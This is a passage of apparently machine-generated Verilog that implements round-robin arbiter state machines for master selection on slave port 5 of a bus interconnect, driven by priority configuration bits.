                        s5_msel_arb0_next_state = s5_msel_arb0_grant5;
                    end
                    else
                    begin 
                        if ( s5_msel_arb0_req[6] ) 
                        begin
                            s5_msel_arb0_next_state = s5_msel_arb0_grant6;
                        end
                        else
                        begin 
                            if ( s5_msel_arb0_req[7] ) 
                            begin
                                s5_msel_arb0_next_state = s5_msel_arb0_grant7;
                            end
                            else
                            begin 
                                if ( s5_msel_arb0_req[0] ) 
                                begin
                                    s5_msel_arb0_next_state = s5_msel_arb0_grant0;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb0_req[1] ) 
                                    begin
                                        s5_msel_arb0_next_state = s5_msel_arb0_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb0_req[2] ) 
                                        begin
                                            s5_msel_arb0_next_state = s5_msel_arb0_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb0_grant4:
        begin
            if (  !( s5_msel_arb0_req[4]) | 1'b0 ) 
            begin
                if ( s5_msel_arb0_req[5] ) 
                begin
                    s5_msel_arb0_next_state = s5_msel_arb0_grant5;
                end
                else
                begin 
                    if ( s5_msel_arb0_req[6] ) 
                    begin
                        s5_msel_arb0_next_state = s5_msel_arb0_grant6;
                    end
                    else
                    begin 
                        if ( s5_msel_arb0_req[7] ) 
                        begin
                            s5_msel_arb0_next_state = s5_msel_arb0_grant7;
                        end
                        else
                        begin 
                            if ( s5_msel_arb0_req[0] ) 
                            begin
                                s5_msel_arb0_next_state = s5_msel_arb0_grant0;
                            end
                            else
                            begin 
                                if ( s5_msel_arb0_req[1] ) 
                                begin
                                    s5_msel_arb0_next_state = s5_msel_arb0_grant1;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb0_req[2] ) 
                                    begin
                                        s5_msel_arb0_next_state = s5_msel_arb0_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb0_req[3] ) 
                                        begin
                                            s5_msel_arb0_next_state = s5_msel_arb0_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb0_grant5:
        begin
            if (  !( s5_msel_arb0_req[5]) | 1'b0 ) 
            begin
                if ( s5_msel_arb0_req[6] ) 
                begin
                    s5_msel_arb0_next_state = s5_msel_arb0_grant6;
                end
                else
                begin 
                    if ( s5_msel_arb0_req[7] ) 
                    begin
                        s5_msel_arb0_next_state = s5_msel_arb0_grant7;
                    end
                    else
                    begin 
                        if ( s5_msel_arb0_req[0] ) 
                        begin
                            s5_msel_arb0_next_state = s5_msel_arb0_grant0;
                        end
                        else
                        begin 
                            if ( s5_msel_arb0_req[1] ) 
                            begin
                                s5_msel_arb0_next_state = s5_msel_arb0_grant1;
                            end
                            else
                            begin 
                                if ( s5_msel_arb0_req[2] ) 
                                begin
                                    s5_msel_arb0_next_state = s5_msel_arb0_grant2;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb0_req[3] ) 
                                    begin
                                        s5_msel_arb0_next_state = s5_msel_arb0_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb0_req[4] ) 
                                        begin
                                            s5_msel_arb0_next_state = s5_msel_arb0_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb0_grant6:
        begin
            if (  !( s5_msel_arb0_req[6]) | 1'b0 ) 
            begin
                if ( s5_msel_arb0_req[7] ) 
                begin
                    s5_msel_arb0_next_state = s5_msel_arb0_grant7;
                end
                else
                begin 
                    if ( s5_msel_arb0_req[0] ) 
                    begin
                        s5_msel_arb0_next_state = s5_msel_arb0_grant0;
                    end
                    else
                    begin 
                        if ( s5_msel_arb0_req[1] ) 
                        begin
                            s5_msel_arb0_next_state = s5_msel_arb0_grant1;
                        end
                        else
                        begin 
                            if ( s5_msel_arb0_req[2] ) 
                            begin
                                s5_msel_arb0_next_state = s5_msel_arb0_grant2;
                            end
                            else
                            begin 
                                if ( s5_msel_arb0_req[3] ) 
                                begin
                                    s5_msel_arb0_next_state = s5_msel_arb0_grant3;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb0_req[4] ) 
                                    begin
                                        s5_msel_arb0_next_state = s5_msel_arb0_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb0_req[5] ) 
                                        begin
                                            s5_msel_arb0_next_state = s5_msel_arb0_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb0_grant7:
        begin
            if (  !( s5_msel_arb0_req[7]) | 1'b0 ) 
            begin
                if ( s5_msel_arb0_req[0] ) 
                begin
                    s5_msel_arb0_next_state = s5_msel_arb0_grant0;
                end
                else
                begin 
                    if ( s5_msel_arb0_req[1] ) 
                    begin
                        s5_msel_arb0_next_state = s5_msel_arb0_grant1;
                    end
                    else
                    begin 
                        if ( s5_msel_arb0_req[2] ) 
                        begin
                            s5_msel_arb0_next_state = s5_msel_arb0_grant2;
                        end
                        else
                        begin 
                            if ( s5_msel_arb0_req[3] ) 
                            begin
                                s5_msel_arb0_next_state = s5_msel_arb0_grant3;
                            end
                            else
                            begin 
                                if ( s5_msel_arb0_req[4] ) 
                                begin
                                    s5_msel_arb0_next_state = s5_msel_arb0_grant4;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb0_req[5] ) 
                                    begin
                                        s5_msel_arb0_next_state = s5_msel_arb0_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb0_req[6] ) 
                                        begin
                                            s5_msel_arb0_next_state = s5_msel_arb0_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s5_msel_arb1_req = { ( s5_msel_req[7] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'd1 ) ), ( s5_msel_req[6] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'd1 ) ), ( s5_msel_req[5] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'd1 ) ), ( s5_msel_req[4] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'd1 ) ), ( s5_msel_req[3] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'd1 ) ), ( s5_msel_req[2] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'd1 ) ), ( s5_msel_req[1] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'd1 ) ), ( s5_msel_req[0] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'd1 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s5_msel_arb1_state <= s5_msel_arb1_grant0;
        end
        else
        begin 
            s5_msel_arb1_state <= s5_msel_arb1_next_state;
        end
    end
    always @ (  s5_msel_arb1_state or  { ( s5_msel_req[7] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'd1 ) ), ( s5_msel_req[6] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'd1 ) ), ( s5_msel_req[5] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'd1 ) ), ( s5_msel_req[4] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'd1 ) ), ( s5_msel_req[3] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'd1 ) ), ( s5_msel_req[2] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'd1 ) ), ( s5_msel_req[1] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'd1 ) ), ( s5_msel_req[0] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'd1 ) ) } or  1'b0)
    begin
        s5_msel_arb1_next_state = s5_msel_arb1_state;
        case ( s5_msel_arb1_state ) 
        s5_msel_arb1_grant0:
        begin
            if (  !( s5_msel_arb1_req[0]) | 1'b0 ) 
            begin
                if ( s5_msel_arb1_req[1] ) 
                begin
                    s5_msel_arb1_next_state = s5_msel_arb1_grant1;
                end
                else
                begin 
                    if ( s5_msel_arb1_req[2] ) 
                    begin
                        s5_msel_arb1_next_state = s5_msel_arb1_grant2;
                    end
                    else
                    begin 
                        if ( s5_msel_arb1_req[3] ) 
                        begin
                            s5_msel_arb1_next_state = s5_msel_arb1_grant3;
                        end
                        else
                        begin 
                            if ( s5_msel_arb1_req[4] ) 
                            begin
                                s5_msel_arb1_next_state = s5_msel_arb1_grant4;
                            end
                            else
                            begin 
                                if ( s5_msel_arb1_req[5] ) 
                                begin
                                    s5_msel_arb1_next_state = s5_msel_arb1_grant5;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb1_req[6] ) 
                                    begin
                                        s5_msel_arb1_next_state = s5_msel_arb1_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb1_req[7] ) 
                                        begin
                                            s5_msel_arb1_next_state = s5_msel_arb1_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb1_grant1:
        begin
            if (  !( s5_msel_arb1_req[1]) | 1'b0 ) 
            begin
                if ( s5_msel_arb1_req[2] ) 
                begin
                    s5_msel_arb1_next_state = s5_msel_arb1_grant2;
                end
                else
                begin 
                    if ( s5_msel_arb1_req[3] ) 
                    begin
                        s5_msel_arb1_next_state = s5_msel_arb1_grant3;
                    end
                    else
                    begin 
                        if ( s5_msel_arb1_req[4] ) 
                        begin
                            s5_msel_arb1_next_state = s5_msel_arb1_grant4;
                        end
                        else
                        begin 
                            if ( s5_msel_arb1_req[5] ) 
                            begin
                                s5_msel_arb1_next_state = s5_msel_arb1_grant5;
                            end
                            else
                            begin 
                                if ( s5_msel_arb1_req[6] ) 
                                begin
                                    s5_msel_arb1_next_state = s5_msel_arb1_grant6;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb1_req[7] ) 
                                    begin
                                        s5_msel_arb1_next_state = s5_msel_arb1_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb1_req[0] ) 
                                        begin
                                            s5_msel_arb1_next_state = s5_msel_arb1_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb1_grant2:
        begin
            if (  !( s5_msel_arb1_req[2]) | 1'b0 ) 
            begin
                if ( s5_msel_arb1_req[3] ) 
                begin
                    s5_msel_arb1_next_state = s5_msel_arb1_grant3;
                end
                else
                begin 
                    if ( s5_msel_arb1_req[4] ) 
                    begin
                        s5_msel_arb1_next_state = s5_msel_arb1_grant4;
                    end
                    else
                    begin 
                        if ( s5_msel_arb1_req[5] ) 
                        begin
                            s5_msel_arb1_next_state = s5_msel_arb1_grant5;
                        end
                        else
                        begin 
                            if ( s5_msel_arb1_req[6] ) 
                            begin
                                s5_msel_arb1_next_state = s5_msel_arb1_grant6;
                            end
                            else
                            begin 
                                if ( s5_msel_arb1_req[7] ) 
                                begin
                                    s5_msel_arb1_next_state = s5_msel_arb1_grant7;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb1_req[0] ) 
                                    begin
                                        s5_msel_arb1_next_state = s5_msel_arb1_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb1_req[1] ) 
                                        begin
                                            s5_msel_arb1_next_state = s5_msel_arb1_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb1_grant3:
        begin
            if (  !( s5_msel_arb1_req[3]) | 1'b0 ) 
            begin
                if ( s5_msel_arb1_req[4] ) 
                begin
                    s5_msel_arb1_next_state = s5_msel_arb1_grant4;
                end
                else
                begin 
                    if ( s5_msel_arb1_req[5] ) 
                    begin
                        s5_msel_arb1_next_state = s5_msel_arb1_grant5;
                    end
                    else
                    begin 
                        if ( s5_msel_arb1_req[6] ) 
                        begin
                            s5_msel_arb1_next_state = s5_msel_arb1_grant6;
                        end
                        else
                        begin 
                            if ( s5_msel_arb1_req[7] ) 
                            begin
                                s5_msel_arb1_next_state = s5_msel_arb1_grant7;
                            end
                            else
                            begin 
                                if ( s5_msel_arb1_req[0] ) 
                                begin
                                    s5_msel_arb1_next_state = s5_msel_arb1_grant0;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb1_req[1] ) 
                                    begin
                                        s5_msel_arb1_next_state = s5_msel_arb1_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb1_req[2] ) 
                                        begin
                                            s5_msel_arb1_next_state = s5_msel_arb1_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb1_grant4:
        begin
            if (  !( s5_msel_arb1_req[4]) | 1'b0 ) 
            begin
                if ( s5_msel_arb1_req[5] ) 
                begin
                    s5_msel_arb1_next_state = s5_msel_arb1_grant5;
                end
                else
                begin 
                    if ( s5_msel_arb1_req[6] ) 
                    begin
                        s5_msel_arb1_next_state = s5_msel_arb1_grant6;
                    end
                    else
                    begin 
                        if ( s5_msel_arb1_req[7] ) 
                        begin
                            s5_msel_arb1_next_state = s5_msel_arb1_grant7;
                        end
                        else
                        begin 
                            if ( s5_msel_arb1_req[0] ) 
                            begin
                                s5_msel_arb1_next_state = s5_msel_arb1_grant0;
                            end
                            else
                            begin 
                                if ( s5_msel_arb1_req[1] ) 
                                begin
                                    s5_msel_arb1_next_state = s5_msel_arb1_grant1;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb1_req[2] ) 
                                    begin
                                        s5_msel_arb1_next_state = s5_msel_arb1_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb1_req[3] ) 
                                        begin
                                            s5_msel_arb1_next_state = s5_msel_arb1_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb1_grant5:
        begin
            if (  !( s5_msel_arb1_req[5]) | 1'b0 ) 
            begin
                if ( s5_msel_arb1_req[6] ) 
                begin
                    s5_msel_arb1_next_state = s5_msel_arb1_grant6;
                end
                else
                begin 
                    if ( s5_msel_arb1_req[7] ) 
                    begin
                        s5_msel_arb1_next_state = s5_msel_arb1_grant7;
                    end
                    else
                    begin 
                        if ( s5_msel_arb1_req[0] ) 
                        begin
                            s5_msel_arb1_next_state = s5_msel_arb1_grant0;
                        end
                        else
                        begin 
                            if ( s5_msel_arb1_req[1] ) 
                            begin
                                s5_msel_arb1_next_state = s5_msel_arb1_grant1;
                            end
                            else
                            begin 
                                if ( s5_msel_arb1_req[2] ) 
                                begin
                                    s5_msel_arb1_next_state = s5_msel_arb1_grant2;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb1_req[3] ) 
                                    begin
                                        s5_msel_arb1_next_state = s5_msel_arb1_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb1_req[4] ) 
                                        begin
                                            s5_msel_arb1_next_state = s5_msel_arb1_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb1_grant6:
        begin
            if (  !( s5_msel_arb1_req[6]) | 1'b0 ) 
            begin
                if ( s5_msel_arb1_req[7] ) 
                begin
                    s5_msel_arb1_next_state = s5_msel_arb1_grant7;
                end
                else
                begin 
                    if ( s5_msel_arb1_req[0] ) 
                    begin
                        s5_msel_arb1_next_state = s5_msel_arb1_grant0;
                    end
                    else
                    begin 
                        if ( s5_msel_arb1_req[1] ) 
                        begin
                            s5_msel_arb1_next_state = s5_msel_arb1_grant1;
                        end
                        else
                        begin 
                            if ( s5_msel_arb1_req[2] ) 
                            begin
                                s5_msel_arb1_next_state = s5_msel_arb1_grant2;
                            end
                            else
                            begin 
                                if ( s5_msel_arb1_req[3] ) 
                                begin
                                    s5_msel_arb1_next_state = s5_msel_arb1_grant3;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb1_req[4] ) 
                                    begin
                                        s5_msel_arb1_next_state = s5_msel_arb1_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb1_req[5] ) 
                                        begin
                                            s5_msel_arb1_next_state = s5_msel_arb1_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb1_grant7:
        begin
            if (  !( s5_msel_arb1_req[7]) | 1'b0 ) 
            begin
                if ( s5_msel_arb1_req[0] ) 
                begin
                    s5_msel_arb1_next_state = s5_msel_arb1_grant0;
                end
                else
                begin 
                    if ( s5_msel_arb1_req[1] ) 
                    begin
                        s5_msel_arb1_next_state = s5_msel_arb1_grant1;
                    end
                    else
                    begin 
                        if ( s5_msel_arb1_req[2] ) 
                        begin
                            s5_msel_arb1_next_state = s5_msel_arb1_grant2;
                        end
                        else
                        begin 
                            if ( s5_msel_arb1_req[3] ) 
                            begin
                                s5_msel_arb1_next_state = s5_msel_arb1_grant3;
                            end
                            else
                            begin 
                                if ( s5_msel_arb1_req[4] ) 
                                begin
                                    s5_msel_arb1_next_state = s5_msel_arb1_grant4;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb1_req[5] ) 
                                    begin
                                        s5_msel_arb1_next_state = s5_msel_arb1_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb1_req[6] ) 
                                        begin
                                            s5_msel_arb1_next_state = s5_msel_arb1_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s5_msel_arb2_req = { ( s5_msel_req[7] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'd2 ) ), ( s5_msel_req[6] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'd2 ) ), ( s5_msel_req[5] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'd2 ) ), ( s5_msel_req[4] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'd2 ) ), ( s5_msel_req[3] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'd2 ) ), ( s5_msel_req[2] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'd2 ) ), ( s5_msel_req[1] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'd2 ) ), ( s5_msel_req[0] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'd2 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s5_msel_arb2_state <= s5_msel_arb2_grant0;
        end
        else
        begin 
            s5_msel_arb2_state <= s5_msel_arb2_next_state;
        end
    end
    always @ (  s5_msel_arb2_state or  { ( s5_msel_req[7] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[15] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[14] ) ) } == 2'd2 ) ), ( s5_msel_req[6] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[13] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[12] ) ) } == 2'd2 ) ), ( s5_msel_req[5] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[11] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[10] ) ) } == 2'd2 ) ), ( s5_msel_req[4] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[9] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[8] ) ) } == 2'd2 ) ), ( s5_msel_req[3] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[7] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[6] ) ) } == 2'd2 ) ), ( s5_msel_req[2] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[5] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[4] ) ) } == 2'd2 ) ), ( s5_msel_req[1] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[3] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[2] ) ) } == 2'd2 ) ), ( s5_msel_req[0] & ( { ( ( ( s5_msel_pri_sel == 2'd2 ) ) ? ( rf_conf5[1] ) : ( 1'b0 ) ), ( ( ( s5_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf5[0] ) ) } == 2'd2 ) ) } or  1'b0)
    begin
        s5_msel_arb2_next_state = s5_msel_arb2_state;
        case ( s5_msel_arb2_state ) 
        s5_msel_arb2_grant0:
        begin
            if (  !( s5_msel_arb2_req[0]) | 1'b0 ) 
            begin
                if ( s5_msel_arb2_req[1] ) 
                begin
                    s5_msel_arb2_next_state = s5_msel_arb2_grant1;
                end
                else
                begin 
                    if ( s5_msel_arb2_req[2] ) 
                    begin
                        s5_msel_arb2_next_state = s5_msel_arb2_grant2;
                    end
                    else
                    begin 
                        if ( s5_msel_arb2_req[3] ) 
                        begin
                            s5_msel_arb2_next_state = s5_msel_arb2_grant3;
                        end
                        else
                        begin 
                            if ( s5_msel_arb2_req[4] ) 
                            begin
                                s5_msel_arb2_next_state = s5_msel_arb2_grant4;
                            end
                            else
                            begin 
                                if ( s5_msel_arb2_req[5] ) 
                                begin
                                    s5_msel_arb2_next_state = s5_msel_arb2_grant5;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb2_req[6] ) 
                                    begin
                                        s5_msel_arb2_next_state = s5_msel_arb2_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb2_req[7] ) 
                                        begin
                                            s5_msel_arb2_next_state = s5_msel_arb2_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb2_grant1:
        begin
            if (  !( s5_msel_arb2_req[1]) | 1'b0 ) 
            begin
                if ( s5_msel_arb2_req[2] ) 
                begin
                    s5_msel_arb2_next_state = s5_msel_arb2_grant2;
                end
                else
                begin 
                    if ( s5_msel_arb2_req[3] ) 
                    begin
                        s5_msel_arb2_next_state = s5_msel_arb2_grant3;
                    end
                    else
                    begin 
                        if ( s5_msel_arb2_req[4] ) 
                        begin
                            s5_msel_arb2_next_state = s5_msel_arb2_grant4;
                        end
                        else
                        begin 
                            if ( s5_msel_arb2_req[5] ) 
                            begin
                                s5_msel_arb2_next_state = s5_msel_arb2_grant5;
                            end
                            else
                            begin 
                                if ( s5_msel_arb2_req[6] ) 
                                begin
                                    s5_msel_arb2_next_state = s5_msel_arb2_grant6;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb2_req[7] ) 
                                    begin
                                        s5_msel_arb2_next_state = s5_msel_arb2_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb2_req[0] ) 
                                        begin
                                            s5_msel_arb2_next_state = s5_msel_arb2_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb2_grant2:
        begin
            if (  !( s5_msel_arb2_req[2]) | 1'b0 ) 
            begin
                if ( s5_msel_arb2_req[3] ) 
                begin
                    s5_msel_arb2_next_state = s5_msel_arb2_grant3;
                end
                else
                begin 
                    if ( s5_msel_arb2_req[4] ) 
                    begin
                        s5_msel_arb2_next_state = s5_msel_arb2_grant4;
                    end
                    else
                    begin 
                        if ( s5_msel_arb2_req[5] ) 
                        begin
                            s5_msel_arb2_next_state = s5_msel_arb2_grant5;
                        end
                        else
                        begin 
                            if ( s5_msel_arb2_req[6] ) 
                            begin
                                s5_msel_arb2_next_state = s5_msel_arb2_grant6;
                            end
                            else
                            begin 
                                if ( s5_msel_arb2_req[7] ) 
                                begin
                                    s5_msel_arb2_next_state = s5_msel_arb2_grant7;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb2_req[0] ) 
                                    begin
                                        s5_msel_arb2_next_state = s5_msel_arb2_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb2_req[1] ) 
                                        begin
                                            s5_msel_arb2_next_state = s5_msel_arb2_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb2_grant3:
        begin
            if (  !( s5_msel_arb2_req[3]) | 1'b0 ) 
            begin
                if ( s5_msel_arb2_req[4] ) 
                begin
                    s5_msel_arb2_next_state = s5_msel_arb2_grant4;
                end
                else
                begin 
                    if ( s5_msel_arb2_req[5] ) 
                    begin
                        s5_msel_arb2_next_state = s5_msel_arb2_grant5;
                    end
                    else
                    begin 
                        if ( s5_msel_arb2_req[6] ) 
                        begin
                            s5_msel_arb2_next_state = s5_msel_arb2_grant6;
                        end
                        else
                        begin 
                            if ( s5_msel_arb2_req[7] ) 
                            begin
                                s5_msel_arb2_next_state = s5_msel_arb2_grant7;
                            end
                            else
                            begin 
                                if ( s5_msel_arb2_req[0] ) 
                                begin
                                    s5_msel_arb2_next_state = s5_msel_arb2_grant0;
                                end
                                else
                                begin 
                                    if ( s5_msel_arb2_req[1] ) 
                                    begin
                                        s5_msel_arb2_next_state = s5_msel_arb2_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s5_msel_arb2_req[2] ) 
                                        begin
                                            s5_msel_arb2_next_state = s5_msel_arb2_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s5_msel_arb2_grant4:
        begin
            if (  !( s5_msel_arb2_req[4]) | 1'b0 ) 
            begin
                if ( s5_msel_arb2_req[5] ) 
                begin
                    s5_msel_arb2_next_state = s5_msel_arb2_grant5;
                end
                else
                begin 
